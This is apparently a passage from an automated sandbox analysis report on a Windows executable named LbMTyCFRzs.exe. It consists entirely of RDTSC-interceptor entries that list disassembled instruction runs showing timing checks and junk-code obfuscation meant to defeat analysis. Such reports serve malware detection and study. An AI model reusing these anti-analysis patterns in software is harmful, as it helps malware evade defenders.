Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: 53E0EDF second address: 53E0EE5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: 53E0EE5 second address: 53E0EE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: 53E0EE9 second address: 53E0EED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: 53E0EED second address: 53E0F2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007FF4D529DDF9h 0x00000012 adc esi, 4A51D5B6h 0x00000018 jmp 00007FF4D529DDF1h 0x0000001d popfd 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: 53E0F2D second address: 53E0F32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: 53E0F32 second address: 53E0F40 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF4D529DDEAh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: 53E0F40 second address: 53E0F44 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: 5380134 second address: 5380138 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: 5380138 second address: 538013E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: 538013E second address: 53801AC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edi, cx 0x00000006 pushfd 0x00000007 jmp 00007FF4D529DDEEh 0x0000000c or si, 73B8h 0x00000011 jmp 00007FF4D529DDEBh 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a xchg eax, ebp 0x0000001b jmp 00007FF4D529DDF6h 0x00000020 mov ebp, esp 0x00000022 jmp 00007FF4D529DDF0h 0x00000027 push dword ptr [ebp+04h] 0x0000002a push eax 0x0000002b push edx 0x0000002c jmp 00007FF4D529DDF7h 0x00000031 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: 5380231 second address: 5380248 instructions: 0x00000000 rdtsc 0x00000002 mov edx, esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 movzx ecx, dx 0x00000009 popad 0x0000000a pop ebp 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FF4D46D40BAh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: 53A0B38 second address: 53A0B3E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: 53A0769 second address: 53A07B3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, 0605E2C2h 0x00000008 mov edx, 54D3690Eh 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push ebp 0x00000011 pushad 0x00000012 pushfd 0x00000013 jmp 00007FF4D46D40C0h 0x00000018 sbb cx, 1058h 0x0000001d jmp 00007FF4D46D40BBh 0x00000022 popfd 0x00000023 popad 0x00000024 mov dword ptr [esp], ebp 0x00000027 push eax 0x00000028 push edx 0x00000029 jmp 00007FF4D46D40C0h 0x0000002e rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: 53A07B3 second address: 53A07FC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF4D529DDEBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b jmp 00007FF4D529DDF6h 0x00000010 pop ebp 0x00000011 pushad 0x00000012 pushfd 0x00000013 jmp 00007FF4D529DDEEh 0x00000018 adc ah, 00000048h 0x0000001b jmp 00007FF4D529DDEBh 0x00000020 popfd 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: 53A0688 second address: 53A06D7 instructions: 0x00000000 rdtsc 0x00000002 mov ebx, esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 xchg eax, ebp 0x00000008 jmp 00007FF4D46D40BCh 0x0000000d push eax 0x0000000e pushad 0x0000000f mov si, di 0x00000012 push eax 0x00000013 push edx 0x00000014 pushfd 0x00000015 jmp 00007FF4D46D40C3h 0x0000001a adc esi, 09CEF6DEh 0x00000020 jmp 00007FF4D46D40C9h 0x00000025 popfd 0x00000026 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: 53A06D7 second address: 53A06DB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: 53A06DB second address: 53A0729 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 xchg eax, ebp 0x00000008 pushad 0x00000009 movzx eax, bx 0x0000000c jmp 00007FF4D46D40BFh 0x00000011 popad 0x00000012 mov ebp, esp 0x00000014 jmp 00007FF4D46D40C6h 0x00000019 pop ebp 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007FF4D46D40C7h 0x00000021 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: 53A0372 second address: 53A03E9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF4D529DDF9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b mov bl, ah 0x0000000d pushfd 0x0000000e jmp 00007FF4D529DDF9h 0x00000013 sbb al, 00000036h 0x00000016 jmp 00007FF4D529DDF1h 0x0000001b popfd 0x0000001c popad 0x0000001d push eax 0x0000001e pushad 0x0000001f pushad 0x00000020 pushfd 0x00000021 jmp 00007FF4D529DDEDh 0x00000026 jmp 00007FF4D529DDEBh 0x0000002b popfd 0x0000002c mov ax, 840Fh 0x00000030 popad 0x00000031 push eax 0x00000032 push edx 0x00000033 mov edx, ecx 0x00000035 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: 53A03E9 second address: 53A043A instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FF4D46D40BEh 0x00000008 xor al, FFFFFFB8h 0x0000000b jmp 00007FF4D46D40BBh 0x00000010 popfd 0x00000011 pop edx 0x00000012 pop eax 0x00000013 popad 0x00000014 xchg eax, ebp 0x00000015 jmp 00007FF4D46D40C6h 0x0000001a mov ebp, esp 0x0000001c pushad 0x0000001d mov si, 08ADh 0x00000021 mov esi, 676082A9h 0x00000026 popad 0x00000027 pop ebp 0x00000028 push eax 0x00000029 push edx 0x0000002a pushad 0x0000002b movsx ebx, cx 0x0000002e push ecx 0x0000002f pop ebx 0x00000030 popad 0x00000031 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: 53B022C second address: 53B0232 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: 53B0232 second address: 53B0236 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: 53B0236 second address: 53B0245 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: 53B0245 second address: 53B0249 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: 53B0249 second address: 53B024F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: 53B024F second address: 53B0255 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: 53B0255 second address: 53B0259 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: 53B0259 second address: 53B0285 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF4D46D40C2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], ebp 0x0000000e pushad 0x0000000f mov esi, 3AFC73EDh 0x00000014 mov ch, 61h 0x00000016 popad 0x00000017 mov ebp, esp 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: 53B0285 second address: 53B0289 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: 53B0289 second address: 53B028F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: 53B028F second address: 53B02A2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov si, dx 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop ebp 0x0000000c pushad 0x0000000d pushad 0x0000000e mov si, di 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: 53B02A2 second address: 53B02AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: 53E0DAB second address: 53E0DBA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF4D529DDEBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: 53E0DBA second address: 53E0DC0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: 53E0DC0 second address: 53E0DC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: 53E0DC4 second address: 53E0DC8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: 53E0DC8 second address: 53E0DE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FF4D529DDEDh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: 53E0DE0 second address: 53E0E05 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF4D46D40C1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FF4D46D40BDh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: 53C039D second address: 53C03C0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF4D529DDF8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: 53C03C0 second address: 53C03C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: 53C03C4 second address: 53C03C8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: 53C03C8 second address: 53C03CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: 53C03CE second address: 53C03E4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF4D529DDF2h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: 53C03E4 second address: 53C045B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 jmp 00007FF4D46D40C7h 0x0000000e mov ebp, esp 0x00000010 pushad 0x00000011 pushfd 0x00000012 jmp 00007FF4D46D40BBh 0x00000017 add ecx, 7354B08Eh 0x0000001d jmp 00007FF4D46D40C9h 0x00000022 popfd 0x00000023 popad 0x00000024 mov eax, dword ptr [ebp+08h] 0x00000027 jmp 00007FF4D46D40BEh 0x0000002c and dword ptr [eax], 00000000h 0x0000002f push eax 0x00000030 push edx 0x00000031 pushad 0x00000032 jmp 00007FF4D46D40BDh 0x00000037 mov dl, ah 0x00000039 popad 0x0000003a rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: 53C045B second address: 53C0478 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF4D529DDF9h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: 53C0478 second address: 53C047C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: 53C047C second address: 53C048E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 and dword ptr [eax+04h], 00000000h 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: 53C048E second address: 53C0494 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: 53C0494 second address: 53C04D1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FF4D529DDF7h 0x00000009 sub ecx, 1DDD460Eh 0x0000000f jmp 00007FF4D529DDF9h 0x00000014 popfd 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: 53A05A4 second address: 53A05DD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF4D46D40C9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d call 00007FF4D46D40C3h 0x00000012 pop ecx 0x00000013 mov cx, dx 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: 53A05DD second address: 53A0643 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FF4D529DDF0h 0x00000008 mov ecx, 6E56D8F1h 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 mov ebp, esp 0x00000012 pushad 0x00000013 call 00007FF4D529DDEAh 0x00000018 pushfd 0x00000019 jmp 00007FF4D529DDF2h 0x0000001e xor eax, 6BAD22F8h 0x00000024 jmp 00007FF4D529DDEBh 0x00000029 popfd 0x0000002a pop ecx 0x0000002b mov ebx, 33C6F63Ch 0x00000030 popad 0x00000031 pop ebp 0x00000032 push eax 0x00000033 push edx 0x00000034 push eax 0x00000035 push edx 0x00000036 jmp 00007FF4D529DDEDh 0x0000003b rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: 53A0643 second address: 53A0647 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: 53A0647 second address: 53A064D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: 53B0EC7 second address: 53B0F3E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FF4D46D40C2h 0x00000008 pop ecx 0x00000009 pushfd 0x0000000a jmp 00007FF4D46D40BBh 0x0000000f sbb cx, E7DEh 0x00000014 jmp 00007FF4D46D40C9h 0x00000019 popfd 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d push eax 0x0000001e pushad 0x0000001f jmp 00007FF4D46D40C7h 0x00000024 call 00007FF4D46D40C8h 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: 53B0F3E second address: 53B0F51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 xchg eax, ebp 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FF4D529DDEAh 0x0000000e rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: 53B0F51 second address: 53B0F79 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF4D46D40BBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b pushad 0x0000000c call 00007FF4D46D40C4h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: 53B0F79 second address: 53B0FB1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushfd 0x00000006 jmp 00007FF4D529DDF1h 0x0000000b adc eax, 49AC7A36h 0x00000011 jmp 00007FF4D529DDF1h 0x00000016 popfd 0x00000017 popad 0x00000018 pop ebp 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c pushad 0x0000001d popad 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: 53B0FB1 second address: 53B0FB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: 53C01F0 second address: 53C01F6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: 53C01F6 second address: 53C01FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: 53E0691 second address: 53E06A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF4D529DDEEh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: 53E06A3 second address: 53E06E6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 jmp 00007FF4D46D40BCh 0x0000000e mov dword ptr [esp], ebp 0x00000011 jmp 00007FF4D46D40C0h 0x00000016 mov ebp, esp 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007FF4D46D40C7h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: 53E06E6 second address: 53E0722 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF4D529DDF9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ecx 0x0000000a pushad 0x0000000b call 00007FF4D529DDECh 0x00000010 mov eax, 486E6331h 0x00000015 pop eax 0x00000016 movsx edx, si 0x00000019 popad 0x0000001a push eax 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: 53E0722 second address: 53E0728 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: 53E0728 second address: 53E072E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: 53E072E second address: 53E0732 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: 53E0732 second address: 53E0795 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF4D529DDEFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ecx 0x0000000c pushad 0x0000000d mov cx, 708Bh 0x00000011 mov dx, si 0x00000014 popad 0x00000015 mov eax, dword ptr [76FA65FCh] 0x0000001a pushad 0x0000001b mov ax, 5F5Fh 0x0000001f push ecx 0x00000020 pushfd 0x00000021 jmp 00007FF4D529DDEBh 0x00000026 sbb al, FFFFFFAEh 0x00000029 jmp 00007FF4D529DDF9h 0x0000002e popfd 0x0000002f pop ecx 0x00000030 popad 0x00000031 test eax, eax 0x00000033 push eax 0x00000034 push edx 0x00000035 jmp 00007FF4D529DDEAh 0x0000003a rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: 53E0795 second address: 53E07CE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF4D46D40BBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007FF546217278h 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 pushfd 0x00000013 jmp 00007FF4D46D40BEh 0x00000018 sub si, 7C88h 0x0000001d jmp 00007FF4D46D40BBh 0x00000022 popfd 0x00000023 popad 0x00000024 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: 53E07CE second address: 53E07D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: 53E07D4 second address: 53E07D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: 53E07D8 second address: 53E0802 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ecx, eax 0x0000000a jmp 00007FF4D529DDF7h 0x0000000f xor eax, dword ptr [ebp+08h] 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: 53E0802 second address: 53E0806 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: 53E0806 second address: 53E080A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: 53E080A second address: 53E0810 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: 5390047 second address: 5390059 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF4D529DDEEh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: 5390059 second address: 539005D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: 539005D second address: 5390098 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 pushad 0x0000000a pushfd 0x0000000b jmp 00007FF4D529DDEDh 0x00000010 sbb esi, 7ED33DA6h 0x00000016 jmp 00007FF4D529DDF1h 0x0000001b popfd 0x0000001c mov edi, ecx 0x0000001e popad 0x0000001f mov ebp, esp 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 pushad 0x00000026 popad 0x00000027 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: 5390098 second address: 53900A7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF4D46D40BBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
